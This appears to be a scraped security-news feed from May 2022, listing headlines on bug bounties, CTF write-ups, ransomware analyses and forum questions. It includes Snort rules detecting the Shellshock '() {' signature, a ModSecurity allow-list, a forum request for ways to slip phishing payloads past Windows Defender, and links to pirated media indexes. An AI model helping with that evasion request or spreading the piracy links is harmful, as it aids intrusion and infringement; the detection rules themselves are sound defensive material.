    Article URL: https://mmmds.pl/clamav/ Comments URL: https://news.ycombinator.com/item?id=31291190 Points: 2 # Comments: 0

  • Open

    KaijuKingz P2E Bug Bounty
    Introduction Continue reading on Medium »
    Remote Code Execution Web Application Vulnerability : File Inclusion Part
    File Inclusion Continue reading on System Weakness »
    I Hacked all of the School Websites in my Town.
    So let’s begin the BLOG. When I got admission to my college,  I noticed that my school had a website. As a Website Pentester and a Curious… Continue reading on Medium »
    How We hacked (bypassed) Admin Panel just by Js file
    Hello world! Continue reading on Medium »
    2FA Bypass in PickMyCareer.in
    I found a 2fa bypass recently in a responsible disclosure program — pickmycareer.in . Continue reading on Medium »
    Zero-day vulnerability and money
    A simple definition would be that a zero-day vulnerability is a vulnerability in a system or device that is not yet patched. An exploit… Continue reading on Medium »
    Chained Bug: XML File Upload to XSS to CSRF to Full Account Take Over (ATO)
    Hello Community, today I'm going to share my experience of how I was able to chain several vulnerabilities into a full account takeover… Continue reading on System Weakness »
  • Open

    digital forensics..help
    Hey guys and gals. Years ago I was taking online classes for digital forensics... never finished due to personal family issues.. I had a two-year-old at the time and was working two jobs, and going to class at midnight or one in the morning was really starting to take its toll... As the years have passed and my son is finally older, I'm really thinking now is the time to finish what I started... However, I went to DeVry and they are currently under lots of fire... Could anyone recommend a free or relatively inexpensive online certification class or something that I could take to dip my toes back in the water?! Thank you in advance!! submitted by /u/Ok-Acanthaceae-4568 [link] [comments]
    Specifying GPG Decryption Key
    I'm working on a digital forensics project involving data recovery. Suppose I have the encryption key (not the passphrase, the actual key) for a file encrypted with GPG symmetric encryption and the encrypted file. How could I go about decrypting the file? Is there a way to specify the use of a specific key for GPG decryption instead of a passphrase? I've considered just trying to decrypt the file content with Python, but GPG uses its own variant of CFB mode, making this a somewhat complicated endeavor. submitted by /u/metal_oarsman [link] [comments]
  • Open

    Multiple IDORs in family pairing api
    TikTok disclosed a bug submitted by s3c: https://hackerone.com/reports/1286332 - Bounty: $7500
    SQL injection in URL path processing on www.ibm.com
    IBM disclosed a bug submitted by asterite: https://hackerone.com/reports/1527284
    Able to bypass email verification and change email to any other user email
    Reddit disclosed a bug submitted by bisesh: https://hackerone.com/reports/1551176 - Bounty: $5000
  • Open

    Cobalt Strike Analysis and Tutorial: CS Metadata Encoding and Decoding
    Cobalt Strike’s metadata encoding algorithm contributes to its versatility and usefulness for red teams and threat actors alike. The post Cobalt Strike Analysis and Tutorial: CS Metadata Encoding and Decoding appeared first on Unit42.
  • Open

    Home-Grown Red Team: Creating A Red Team Development Workstation
    Having a good red team development workstation is essential for creating payloads, testing out new tools and keeping your work organized… Continue reading on Medium »
    My eCPPT journey
    Since I passed my eJPT in October, I decided to continue with INE and go for eCPPT (which can help for my OSCP). Continue reading on Medium »
    Container breakout: CAP_SYS_ADMIN via Creating a cgroup
    Prerequisites: Continue reading on Medium »
  • Open

    Any ideas on how to search ODs for Shopify themes?
    They come in a zip file and always have these subfolders assets config layout locales sections snippets templates I don't know how I can narrow my search to those parameters, anyone know? submitted by /u/Loli_of_Bread [link] [comments]
  • Open

    SecWiki News 2022-05-06 Review
    Several ways domain controllers get compromised by ourren; A generic unhook method for custom jump functions by SecIN community. For more of the latest articles, visit SecWiki
  • Open

    Rubygems CVE-2022-29176 explained
    Article URL: https://greg.molnar.io/blog/rubygems-cve-2022-29176/ Comments URL: https://news.ycombinator.com/item?id=31285049 Points: 2 # Comments: 0
  • Open

    CloudFlare Pages, part 1: The fellowship of the secret
    submitted by /u/albinowax [link] [comments]
    Fuzzing ClamAV with real malware samples
    submitted by /u/mmmds [link] [comments]
  • Open

    Old age as a catalyst for terror
    "Getting old isn't so bad when you consider the alternative" Continue reading on Medium »
  • Open

    Check and locate phone number in OSINT
    The first thing to do to identify a phone number is to establish its belonging to the region and telecom operator, and also to check its… Continue reading on Medium »
    OSINT: Do I have to Capture The Flag(CTF)? Pt1.
    Maybe I'll plant one instead! — make your own CTF Continue reading on Medium »
    War in Ukraine / May 4
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    CyberSoc | Cyber Investigator CTF Writeup
    This CTF was created by Jack T at CyberSoc, the Cyber Security Society at Cardiff University. It is a playground for those who love… Continue reading on Medium »
  • Open

    Beijing Digital Economy Full-Industry-Chain Opening Action Plan (draft for comment) released; the value of data elements is key
    To implement the municipal Party committee and government's strategic plan to accelerate building a global benchmark city for the digital economy, the Beijing Municipal Bureau of Economy and Information Technology has drafted the Beijing Digital Economy Full-Industry-Chain Opening Action Plan (draft for comment).
    White House: preparing for quantum computers that can break cryptography
    US President Joe Biden recently signed a National Security Memorandum (NSM) requiring government agencies to take steps to mitigate the risks that quantum computers pose to US national cybersecurity.
    Microsoft, Apple and Google to support FIDO passwordless sign-in
    Microsoft, Apple and Google jointly announced plans to expand support for the common passwordless sign-in standard developed by the W3C and the FIDO Alliance.
    Google fixes actively exploited Android kernel vulnerability
    Google recently released the second part of the May security patches for Android, which includes a fix for an actively exploited Linux kernel vulnerability.
    Millions of users affected: vulnerabilities hidden in Avast antivirus for nearly 10 years disclosed
    On May 5, SentinelLabs published a report stating that it had found two severe vulnerabilities in the well-known antivirus products Avast and AVG that had existed for nearly 10 years.
    FreeBuf Morning Report | The mystery behind the new REvil ransomware operation's samples; Ukraine war-themed documents become hackers' lure of choice
    Phishers tricked the US Department of Defense into paying $23.5 million.
    CSRC releases the Measures for Cybersecurity Management in the Securities and Futures Industry (draft for comment)
    The Measures comprise eight chapters and 66 articles, covering the cybersecurity supervision system for the securities and futures industry, cybersecurity operations, coordinated data security management, cybersecurity emergency response and more.
  • Open

    Backdoor from HackTheBox — Detailed Walkthrough
    TryHackMe writeup: Atlas
    I have 1% chance to hack this company
    Clique Writeup — ångstromCTF 2022

  • Open

    [Security Advisory] F5 BIG-IP iControl REST authentication bypass vulnerability (C...
    F5 recently published a security advisory for its BIG-IP products disclosing a remote authentication bypass vulnerability: an unauthenticated attacker with network access to the BIG-IP system through the management port or self IP addresses...
  • Open

    From KBs to CVEs: Understanding the Relationships Between Windows Security Updates and Vulnerabilities
    submitted by /u/derp6996 [link] [comments]
    An Easy Misconfiguration to Make: Hidden Dangers in the Cloud Control Plane
    submitted by /u/ajohnston9 [link] [comments]
    The curious case of mavinject.exe
    submitted by /u/sciencestudent99 [link] [comments]
    A Deep Dive into AvosLocker Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    North Korea’s Lazarus: their initial access trade-craft using social media and social engineering
    submitted by /u/digicat [link] [comments]
  • Open

    Passed the GCFE exam today
    So glad to get this behind me, now I need to begin applying the information/knowledge and keep learning. submitted by /u/ATXChimera [link] [comments]
    A Deep Dive into AvosLocker Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Starting a DF business...how much work is out there?
    Title pretty much says it all. If someone wanted to be a principal consultant...how much work is out there? submitted by /u/invictusliber [link] [comments]
  • Open

    Creating a SNORT shellshock rule
    I'm creating a SNORT rule to block shellshock, every time I run this code, I get that it needs to be enclosed in '(' ')'. Like it is in brackets? What am I doing wrong? Alert tcp any any -> $HOME_NET 80 443 (msg: "Shellshock activated"; content: "() {"; sid: 10000000;) Any tips? submitted by /u/LewSm1th [link] [comments]
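    A rule that parses, as an added example that is not part of the post above: Snort 2.9 syntax, assuming `$HOME_NET` and `$EXTERNAL_NET` are defined in snort.conf and the http_inspect preprocessor is enabled. Three things in the posted rule trip the parser: the action keyword must be lowercase `alert`, a list of ports needs brackets and commas (`[80,443]`, not `80 443`), and the quotes must be straight ASCII quotes. The "must be enclosed in ( )" error is what Snort reports when, after reading `80` as the port, it finds `443` where it expected the opening `(` of the rule options.

```snort
# Shellshock (CVE-2014-6271) probe over HTTP: a bash function definition "() {"
# in a request header such as User-Agent, Referer or Cookie.
# Snort 2.9 syntax. "alert" only alerts; use "drop" in inline mode to block.
alert tcp $EXTERNAL_NET any -> $HOME_NET [80,443] (msg:"Shellshock attempt - bash function definition in HTTP header"; flow:to_server,established; content:"() {"; http_header; fast_pattern; reference:cve,2014-6271; classtype:web-application-attack; sid:1000001; rev:1;)
```

    Two caveats a practitioner would want: port 443 carries TLS, so a content match there only fires if traffic is decrypted before it reaches Snort, and `http_header` restricts the match to the normalized HTTP header buffer, which cuts false positives from the string appearing in a POST body or a download. Local rules should use sids of 1000000 or above so they never collide with the distributed rule sets.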
    Looking for SANS SEC 504 GCIH practice tests.
    Does anyone have any extras to share? submitted by /u/Striking-Regular-725 [link] [comments]
  • Open

    AMB Bridge: bug bounty program
    As you may already know, we have recently launched the AMB bridge on the Ambrosus testnet! Continue reading on Ambrosus Ecosystem »
    Remote Code Execution Web Application Vulnerability : Code Injection Part
    Remote code execution (RCE) occurs when an attacker can execute arbitrary code on a target machine because of a vulnerability or… Continue reading on System Weakness »
    You should put scope over exploits! Or should you?
    Continue reading on Medium »
    I have 1% chance to hack this company
    Today I will share with you the first vulnerability I found on SerpApi, LLC. Continue reading on InfoSec Write-ups »
    My Pentest Log -17 - (Stack Trace in ASP.NET)
    Greetings from Perama to all, Continue reading on Medium »
    My First Bounty in Hackerone
    Hi, my name is Jagannath Mohanty. I want to tell you about my first bounty on HackerOne. Let's jump to the bug I reported; it was user/email enumeration… Continue reading on Medium »
  • Open

    What's everyone's favorite phishing framework/tool?
    I think GoPhish is the most popular. I'm going to be playing around with as many as I find over the weekend. I wanted to get some feedback on any favorites you may have used; pros & cons; etc. Thanks in advance for any feedback! submitted by /u/offftherecordz [link] [comments]
    The curious case of mavinject.exe
    submitted by /u/sciencestudent99 [link] [comments]
    What way is currently best for SE payload attacks?
    Microsoft did a huge crackdown on the "evil macros" on office docs about 9 months ago. https://www.zdnet.com/article/microsoft-...el-macros/ It now seems that ANY attempt at creating a shell object in VBS instantly gets flagged by Windows Defender. This used to be bypassed by using an "external" program to create such a shell, i.e. Outlook. So, how can I send my payload now? Sending exes in mail is frowned upon by any spam agency and a plethora of alerts pop up when I do so. Sending a .bat is too sketchy as well and the .lnk trick has also been fixed. submitted by /u/ErikDz11 [link] [comments]
  • Open

    A brief introduction to OSINT (Open Source Intelligence)
    There are many different types of intelligence, but one that is used to be overlooked is open source intelligence (OSINT). Despite being… Continue reading on Medium »
  • Open

    SecWiki News 2022-05-05 Review
    How RASP detects Java Agent in-memory webshells by ourren; Understanding the principles and flow of the key exchange protocol in HTTPS in one article by ourren; What UEBA (User and Entity Behavior Analytics) can be used for (ten scenarios) by h4ck01; Cloud security baselines by h4ck01; Botconf 2022 talks roundup by Avenger; Bug localization using code knowledge graphs by ourren. For more of the latest articles, visit SecWiki
  • Open

    Manually Identifying an X-Cart Credit Card Skimmer
    During a recent investigation, a new client came to us reporting that their antivirus had detected a suspicious domain loading on their website’s checkout page. We regularly receive reports like these, as this is a telltale indicator of a credit card skimmer infection. Our research and remediation teams frequently find credit card skimmers on Magento websites, and more recently on WordPress — however, in this case the customer was using a lesser known eCommerce solution known as X-Cart. Continue reading Manually Identifying an X-Cart Credit Card Skimmer at Sucuri Blog.
  • Open

    DATA INDEXES | 100TB+ DATA COLLECTIVELY | ANIME,COURSES,MOVIES,GUIDES,DBS
    https://gdriveindex.mrdeveloper.workers.dev/0:/ https://mirror.mrha.tk/0:/ https://torrent2drive.video/0:/ https://punishermirror.punisher876.workers.dev/0:// https://sdfmirrorbot2.sdfmirror.workers.dev/0:/ https://sinnerdrive.jack-need-boost.workers.dev/0:// https://drive.movietrigger.workers.dev/0:/ https://arcrec.mark41stark.workers.dev/0:/ https://netflixcrew.rahulinstinct.workers.dev/0:/ https://mydrive.rahul112kapoor.workers.dev/0:/ https://td.lightdrive.workers.dev/1:/ https://otmbd01.sasohan.workers.dev/ https://animelibr.cooldude69.workers.dev/1:/ https://www.savage69.workers.dev/0:/ https://sauraj.rommirrorer.workers.dev/0:/ https://thanosdrive-v2.moviezclub-thanos...rs.dev/0:/ https://megamirrorsakura.iamrehan2064593...rs.dev/0:/ https://cloud.eleventh-hour.workers.dev/0:/ https://drive.spidercloud.workers.dev/1:/ https://sonic.otakus.workers.dev/0:/ https://one.thebayindex.tk/ submitted by /u/9NAAGRAAJ [link] [comments]
  • Open

    PyScript and Security 🐍🗡
    PyScript was recently unveiled in a talk at PyCon US 2022. PyScript is a library that lets you use Python code inside HTML; since it extends Python, with its enormous versatility and low learning curve, onto the web, it is getting a lot of attention and a lot of discussion. Some ask how writing code inside HTML is any different from PHP, and I think I have also seen people call it a step backwards. Design patterns and code quality are things developers will worry about; since we do security engineering, we need to look at it from a security perspective too, so I spent a few days thinking it over and wrote it up.
  • Open

    Deep dive into the Microsoft Netlogon privilege escalation vulnerability (CVE-2020-1472)
    Also known as "Zerologon", this vulnerability has a CVSS score of 10.0, is said to take over a domain controller in 3 seconds, and is extremely dangerous.
    A closer look at PsExec and smbexec
    An in-depth look at PsExec and smbexec from the perspectives of usage and log analysis.
    FreeBuf Morning Report | High-severity DNS vulnerability affects millions of IoT devices; the threat of deepfakes to cybersecurity grows
    A high-severity vulnerability exists in the Domain Name System (DNS) component of the uClibc library; millions of IoT devices worldwide that use uClibc are affected.
    Device takeover risk warning! F5 discloses a critical BIG-IP remote code execution vulnerability
    F5, a global leader in application delivery networking (ADN), recently issued a security warning: its research team has observed a critical vulnerability being actively exploited.
    Analysis of the "8220" cryptomining group's activity
    "8220" is a long-active group skilled at exploiting vulnerabilities to attack systems and deploy cryptominers.
    Back from the dead! Analysis of the new REvil ransomware's in-the-wild attacks
    In January 2022, Russia's FSB claimed that, after receiving information from the US, it had completely dismantled REvil and arrested several members.
    High-severity DNS vulnerability disclosed, affecting millions of IoT devices
    Through this vulnerability, an attacker can carry out DNS poisoning or DNS spoofing attacks and redirect victims to malicious sites instead of legitimate ones.
    Attackers hijack UK NHS email accounts to steal Microsoft credentials
    According to an investigation, over nearly six months the work email accounts of more than 100 employees of the UK's National Health Service (NHS) were used repeatedly in phishing campaigns, some of which aimed to steal Microsoft credentials. After hijacking legitimate NHS email accounts, the attackers began using them last October and continued to use them for phishing until at least April this year. According to researchers at email security firm INKY, more than 1,000 phishing emails were sent from the NHS email accounts of employees in England and Scotland. The researchers tracked
    Attackers deploy backdoor to steal Exchange emails
    An APT group compromised corporate networks and attempted to steal the Exchange emails of employees involved in corporate transactions.
    GitHub: all user accounts must enable two-factor authentication by the end of 2023
    On May 4, GitHub announced that all developers and user accounts that contribute code must enable one or more forms of two-factor authentication (2FA) by the end of 2023.
  • Open

    Github Account Takeover which is used as gradle vcs in "github.com/palantir/gradle-launch-config-plugin"
    Palantir Public disclosed a bug submitted by codermak: https://hackerone.com/reports/1525578 - Bounty: $250
  • Open

    LoNg4j: New Log4j Vulnerability
    Article URL: https://www.cequence.ai/blog/long4j/ Comments URL: https://news.ycombinator.com/item?id=31273048 Points: 4 # Comments: 0
  • Open

    I am starting college, should I start with binary exploitation or web app exploitation, to get jobs and internships? Though I do love binary exploitation, there are not many jobs in Ireland
    submitted by /u/Traditional-Cloud-80 [link] [comments]
    which target to pick after learning basics of binary exploitation? if there is any bug bounty ? sorry if it's lame question
    submitted by /u/Traditional-Cloud-80 [link] [comments]
    QUESTION
    Hello, everyone. First of all, I want to apologize for my nooby question. For a while I've been reading about exploit development, since this field is incredibly interesting to me. Anyway, I came across a video called "The Layman's Guide to Zero-Day Engineering" on YouTube (I wanted to put the link but idk if it's allowed) and I was fascinated by the way they developed the exploit for the Safari browser, so I was wondering if exploit developers know every language??? I tried to google my question but I didn't find an answer. Do professionals have to know the programming language to be able to code the exploit? For example, when you write an exploit for (Linux) C you have to know C, but let's say, for example, you want to code an exploit for JIT or V8. Do you learn JavaScript or do you apply the same knowledge to every exploit regardless of the language? TL;DR (is exploit development independent of language?). Thank you everyone submitted by /u/IBK_0 [link] [comments]
  • Open

    Kernel page feng shui through the lens of Pwn2Own CVE-2022-27666
    Author: v1n3gar of team f-undefined. Original link: https://mp.weixin.qq.com/s/JPbwYA2sS9jCMMgwBxONjg Key points: (1) Use msg_msg to construct an arbitrary write that tampers with modprobe_path, and use FUSE to handle page faults (working around the fact that unprivileged users no longer have userfaultfd access since 5.11; a wave of CTF challenges will surely copy this). (2) Since the vulnerable object is located in...
    In-depth analysis of the CVE-2022-21882 Win32k kernel privilege escalation vulnerability
    Author: Topsec Alpha Lab (天融信阿尔法实验室). Original link: https://mp.weixin.qq.com/s/0aDmaEMXae1_tJXFZVdi6Q CVE-2022-21882 is a local privilege escalation vulnerability in Windows that Microsoft patched in the January 2022 security update. This article analyzes the root cause of the vulnerability and the exploit in detail. 1. Vulnerability overview: CVE-2022-21882 is a bypass of the fix for CVE-2021-1732 and belongs to win3...

  • Open

    Hack To Learn: OSINT and Passive Reconnaissance
    Dear Friend, welcome to HaXeZ where I want to talk about Open-source intelligence and passive reconnaissance. Continue reading on System Weakness »
    War in Ukraine / May 3
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Something from the internet…
    Anonymous web browsing, chatting or just being online can be achieved by mixing different OS configurations such as Tails and Qubes OS… Continue reading on Medium »
    Keeber NahamCon CTF 2022 [OSINT]
    Keeber 1 Continue reading on Medium »
    NahamCon 2022 CTF — Keeber 1, 2, 3, 5
    As part of NahamCon 2022, a 48-hour CTF event was hosted leading up to security conference itself. Continue reading on Medium »
  • Open

    Clickjacking Vulnerability Can Lead To Deleting a Developer APP
    TikTok disclosed a bug submitted by rioncool22: https://hackerone.com/reports/1416612 - Bounty: $500
    One Click Account Hijacking via Unvalidated Deeplink
    TikTok disclosed a bug submitted by fr4via: https://hackerone.com/reports/1500614 - Bounty: $10000
    URL Scheme misconfiguration on TikTok for IOS
    TikTok disclosed a bug submitted by glassplant: https://hackerone.com/reports/1437294 - Bounty: $500
  • Open

    How I found a vulnerability that leads to access to any user's sensitive data and got $500
    Hello everyone! Continue reading on Medium »
    0-click RCE in Electron Applications
    0-click RCE in Electron Applications Continue reading on Medium »
    Business Logic Errors - Art of Testing Cards
    Summary : Continue reading on Medium »
    CVE-2022–25262
    CVE-2022–25262 Continue reading on Medium »
    Information leakage in EXIF data of images(EXIF Data Exposure)
    Summary : Continue reading on Medium »
    Hack the Hackers
    While reading my feeds I came across the "hacking the hackers" heading, so I thought let's try finding bugs on THM (TryHackMe). Continue reading on Medium »
  • Open

    Block all user agents with modsecurity except one?
    I want to block all user agents from my server except for one specific user agent string. How would I create a rule(s) to do this? Thanks! submitted by /u/BelugaBilliam [link] [comments]
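    One way to express this, as an added example that is not part of the post above: two rules in ModSecurity's own SecRule syntax (works with ModSecurity 2.x and 3.x), where `ExpectedAgent/1.0` is a placeholder for the one permitted string. The first rule catches requests that omit the header entirely, which a plain string comparison would otherwise let through because there is nothing to compare.

```apache
# Allow exactly one User-Agent string, deny everything else.
# "ExpectedAgent/1.0" is a placeholder for your permitted agent.
SecRuleEngine On

# Requests with no User-Agent header at all (the "&" prefix counts matches)
SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \
    "id:100001,phase:1,deny,status:403,log,msg:'Blocked: missing User-Agent'"

# Requests whose User-Agent is not exactly the allowed string
SecRule REQUEST_HEADERS:User-Agent "!@streq ExpectedAgent/1.0" \
    "id:100002,phase:1,deny,status:403,log,msg:'Blocked: User-Agent not on allow-list'"
```

    Both rules run in phase 1 (request headers), so the body is never read for rejected requests. The caveat is that the User-Agent header is entirely client-supplied: this filters noise and untargeted scanners, but anyone who learns the allowed string can set it, so it is not a substitute for authentication, client certificates or an IP allow-list.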
    Huawei Network device compliance audit
    Hello!! I am looking for some guidance on how to conduct CIS compliance scans for my Huawei network devices. I use a bunch of other tools such as tripwire, nexpose and some NSPMs for non-Huawei nodes but Huawei devices are not supported by anyone of them(atleast out of the box). Any guidance? Thanks. submitted by /u/Due-Brick6204 [link] [comments]
    Overcoming imposter syndrome very early on
    After getting some help desk experience I decided to apply to more security focused roles and have been given an interview as a security consultant. I am very nervous and because of this I am already considering whether I will be good enough. It will be the longest interviews I’ve done in my life (1hour+). I do not meet most of the desirable skills maybe about 3/5. How can I overcome this and how should I prepare well? I really want this role as I want to push myself. The interview will be held by a senior in the company so don’t want to say anything silly and completely mess up the interview submitted by /u/amvn92 [link] [comments]
    I fucked up and I don't know what to do, please, I need advice
    I recently started browsing r/hacking and I saw a video about a streaming site that started recently; the site was heavily publicized by a YouTuber for its horrible UI, so I visited it to see if the site was so ugly for real. I went to Google and searched for "test site online" and I found a website that lets you run a (not full) security check, just checks if the site is HTTPS and so on. I also found, right after that one, a site that said SQLMAP test. The site had just three options: A URL textbox, A Submit button, A Reset button. I put the site there and two popups were shown: the first said "no major issues" and the second one printed a log and a popup was shown: "you must be authorized to use this on the site". I didn't even fucking know what SQLMAP was before I looked it up after the popup came to the foreground. Am I going to jail? I had a panic attack and I cried for one hour. I was just browsing my phone and I thought it was fun to see if the site was botched or not. I'm panicking, what's wrong with me submitted by /u/__subroutine__ [link] [comments]
  • Open

    Write Blocker
    What write blocker do you recommend using when creating a forensic image of a drive? submitted by /u/Beep-Boop-Bop-Boop [link] [comments]
    GCFA failed :( help required
    Hi guys, I recently failed my GCFA after getting around 60%. I think I made the mistake of frequently referring to the index and books and at the end was left with 5 lab questions. Now I'm planning to re-appear for the exam. Can anyone guide me or give any leads on what I'm missing or need to work on? Thanks. PS. Got above 75% in both practice exams submitted by /u/Mushroom-Fuzzy [link] [comments]
    GCFA Poster Question
    I will be taking my GCFA exam soon and was wondering which posters you printed out that were most helpful to you? Thank you submitted by /u/joe_dro [link] [comments]
  • Open

    Cyberwar In Ukraine Hackers Are Hacking Russia
    submitted by /u/cybersocdm [link] [comments]
    Hacking Power Plants and Industrial Control Systems
    submitted by /u/cybersocdm [link] [comments]
    Update on cyber activity in Eastern Europe
    submitted by /u/dmchell [link] [comments]
  • Open

    SecWiki News 2022-05-04 Review
    No news updated today. For more of the latest articles, visit SecWiki
  • Open

    ELFLoader: Another In Memory Loader Post
    Intro Now that BOFs are commonplace for Windows agents, some people have talked about wanting a non-Windows only version. In this blog post, we’ve got something for you: the same thing but for Linux/Mac. The process of building in memory loaders are the same, no matter the file format type. In this case, we’ll just... The post ELFLoader: Another In Memory Loader Post appeared first on TrustedSec.
  • Open

    NahamCon 2022 CTF Write-up: "No Space Between Us" Challenge
    Rate Limiting attack bypassing invisible captcha
  • Open

    Big Collection For Anime Fans
    15TB of anime (series-movies) https://drive.google.com/drive/folders/1vSdJo_OrJNgVIRYsvTwR-PeLyM8L-V0M submitted by /u/NELARO [link] [comments]
  • Open

    Shady economics of proxy services
    submitted by /u/rushter_ [link] [comments]
    Authenticating with certificates when PKINIT is not supported
    submitted by /u/the-useless-one [link] [comments]
    Themes from Real World Crypto 2022
    submitted by /u/yossarian_flew_away [link] [comments]
    Exploiting Dynamic Linking Procedure In x64 ELF Binaries
    submitted by /u/paran0ide [link] [comments]
  • Open

    FreeBuf Morning Report | Putin orders ministries and agencies to set up IT security departments; pro-Ukraine hackers DDoS Russian websites
    Putin signed a presidential decree on additional measures to ensure Russia's information security, ordering the establishment of IT security departments in every ministry, agency and critical organization.
  • Open

    Critical vulnerability in the Matrix IRC bridge
    Article URL: https://matrix.org/blog/2022/05/04/0-34-0-security-release-for-matrix-appservice-irc-high-severity/ Comments URL: https://news.ycombinator.com/item?id=31257915 Points: 91 # Comments: 13
  • Open

    Putting It All Together
    It's great when a plan, or a puzzle, comes together, isn't it?  I'm not just channeling my inner Hannibal Smith...I'm talking about bringing various pieces or elements together to build a cohesive, clear picture, connecting the dots into a cohesive analysis. To kick this off, Florian had this to say about threat actors moving to using ISO/IMG files as result of Microsoft disabling VBA macros in docs downloaded from the Internet, a change which results in entirely new artifact constellations. After all, a change in TTPs is going to result in changes as to how the system is impacted, and a change in the resultant constellations. So, this sets the stage for our example. In this case, the first piece of the puzzle is this tweet from Max_Mal_, which points to the BumbleBee campaign (more info f…

  • Open

    Master or Certs
    Hey Everyone, I am graduating in August with my Bachelor’s in Computer Forensics/Digital Investigations. Is it better to stay and get my Masters or graduate with a Bachelors and work on getting some certificates? Thanks! submitted by /u/chungusXL316 [link] [comments]
    Advanced Persistent Threat (APT) Malware Samples and Research Papers Collection
    submitted by /u/cybersocdm [link] [comments]
  • Open

    Useful Security Tools and Resources for Digital Forensics
    submitted by /u/Khaotic_Kernel [link] [comments]
    Nozomi Networks Discovers Unpatched DNS Bug in Popular C Standard Library Putting IoT at Risk
    submitted by /u/39816561 [link] [comments]
    Privilege escalation vulnerabilities discovered in Linux known as Nimbuspwn
    submitted by /u/sciencestudent99 [link] [comments]
    New update from Google's Threat Analysis Group finds numerous APTs running campaigns in Ukraine and Est. Europe, including Fancy Bear (Russia), Ghostwriter (Belarus) and Curious Gorge (China).
    submitted by /u/Ramsey_Power [link] [comments]
    Compromising Read-Only Containers with Fileless Malware
    submitted by /u/MiguelHzBz [link] [comments]
    AvosLocker Ransomware Variant Abuses Avast Anti-Rootkit Driver File to Disable Anti-Virus
    submitted by /u/campuscodi [link] [comments]
    Zyxel firmware extraction and password analysis
    submitted by /u/0xdea [link] [comments]
    Hacking a Bank by Finding a 0day in dotCMS
    submitted by /u/Mempodipper [link] [comments]
    DOing Harm
    submitted by /u/netsecfriends [link] [comments]
  • Open

    Can someone find me by my Bluetooth address knowing only my phone number?
    I'm a bit confused and shocked about what happened. TL;DR: Someone sent me a message on WhatsApp saying "are you at this coffee shop?" And yes I was. Here is the story: I'm a freelancer and I took a gig from someone who I have never met. I added his number on my phone to my contacts and we've been texting on WhatsApp regarding the gig. That was in 2019 and the gig lasted for about a couple of months. Fast forward to 2022, a few days ago, I was at a coffee shop and I got a text on WhatsApp from that person asking me if I'm at that same coffee shop! I told him yes but how did you know? He said "I turned on my Bluetooth to connect to my headphones and it showed me that 'my name' is nearby" (the name he saved in his contacts). Some facts: -That person never heard my voice -He does not know what I look like -I have an iPhone (idk what phone he has) -my Bluetooth name is "iPhone" (not unique). I'm mind blown how that happened and if he is actually telling the truth? Does WhatsApp map my Bluetooth address to my phone number somehow? (Or maybe a different app) I know it's theoretically possible but as far as I know, Apple iOS does not allow that kind of mapping submitted by /u/i_R7AL [link] [comments]
    Not able to connect with DNS server
    Hi all, I have a problem with my laptop since two days ago, which basically is that I can't use any browser because a message appears saying "We have problems finding that site" and then it says "We can't connect to (website searched)". I've tried some things like resetting the DNS cache, also resetting the router and more possible solutions I found on the internet, but none of them worked. I use Mozilla Firefox and it has this problem, and I tried Google Chrome and Microsoft Edge and they also have the same problem. The curious thing is that I can use Tor Browser without any problem and make daily use of it. I also used the problem-solving system from the computer and executed it to find any problem with the internet connections; after that, the problem is that the DNS server is not responding, but it also says that it is a problem that can't be solved automatically by the system. Also, I tried to scan my computer with the Avast antivirus program and the computer is not able to open it, so I can't scan in case there is any virus or malware. I used the Microsoft scan that comes with the system and it says that there is no virus or malware found. I also just saw that some apps like Steam or Netflix are not working because they are also not receiving a response from the DNS server, I suppose, and for that reason don't have internet. Thank you for reading and for trying to figure out a solution. I need my laptop running as always for school work and projects, so any help you can give me would be great. submitted by /u/12d12g [link] [comments]
    Introducing security processes in a company from the ground-up
    Hey all, Recently I had a discussion with one of my colleagues about introducing some security processes in our organization. It has been in the pipeline for some time now and we figured that we should probably start working on it while the company is not that big. Plus, we started seeing some occasional DDoS attacks recently (nothing too major or disruptive, but enough to bring up some alarms). What I am curious about is: How would you tackle this problem? How would you prioritize tasks that should be done? How would you get non-tech people on board to follow those best practices? What are some technical solutions that come to mind? To put some context to all of the above: the company doesn't hold any sensitive data (medical records, financial records or credit card numbers), although I would like to hear your opinion on those as well. We are an e-learning platform with a significant user base and people do follow some obvious best practices, like: using password managers, using 2FA (not enforcing it though, but we should), giving access to resources only to people that really need them to perform their job, doing frequent backups, etc. I am a dev with some nice and broad experience in the field. Even though I can navigate myself around IT concepts and security, I've never actually worked in such a role and I don't really know where to start, so any help is much appreciated. :) submitted by /u/d_lipovac [link] [comments]
    Insecure Request Practice
    Hi guys ! I saw a practice one of these days which involved adding user and password to the headers of a request and encoding them with base64. Is this actually correct? if not what would be the best way to fix it? I feel like that way of doing it is quite insecure submitted by /u/Mokushi99 [link] [comments]
    Block legacy protocols for Microsoft applications
    Hi there. I want to block all the old protocols, but I'm afraid that this could lead to availability risks for some applications. Right now I see that only one application Office 365 Exchange Online is using legacy protocols: IMAP Exchange Web Services SMTP Exchange ActiveSync MAPI Over HTTP Offline Address Book Autodiscover Exchange Online Powershell POP How to understand whether there will be risks in the usage of Office 365 Exchange Online if I will block legacy protocols? https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/block-legacy-authentication submitted by /u/athanielx [link] [comments]
  • Open

    Etcd Integrates Continuous Fuzzing
    Article URL: https://www.cncf.io/blog/2022/04/13/etcd-integrates-continuous-fuzzing/ Comments URL: https://news.ycombinator.com/item?id=31254099 Points: 1 # Comments: 0
    Fuzzing Like a Caveman
    Article URL: https://h0mbre.github.io/Fuzzing-Like-A-Caveman/ Comments URL: https://news.ycombinator.com/item?id=31249559 Points: 2 # Comments: 0
    Advanced Go Fuzzing Techniques
    Article URL: https://blog.fuzzbuzz.io/writing-effective-go-fuzz-tests/ Comments URL: https://news.ycombinator.com/item?id=31249130 Points: 3 # Comments: 1
  • Open

    Neither Macron nor Le Pen
    France election results and the country’s political void Continue reading on Medium »
    War in Ukraine / May 2
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Free applications and services for security specialist…
    Let’s talk about those free applications and services that a security specialist should definitely put on a smartphone and computer. First… Continue reading on Medium »
    Maltego Transforms List
    A list of tools that handle different data and make it usable in Maltego. Continue reading on Medium »
    Information gathering from instagram accounts
    Hello guys, my name is Arshia and I'm coming with another interesting tutorial, and in this tutorial you will learn how to gather… Continue reading on Medium »
  • Open

    How I got a lousy T-Shirt from the Dutch Government.
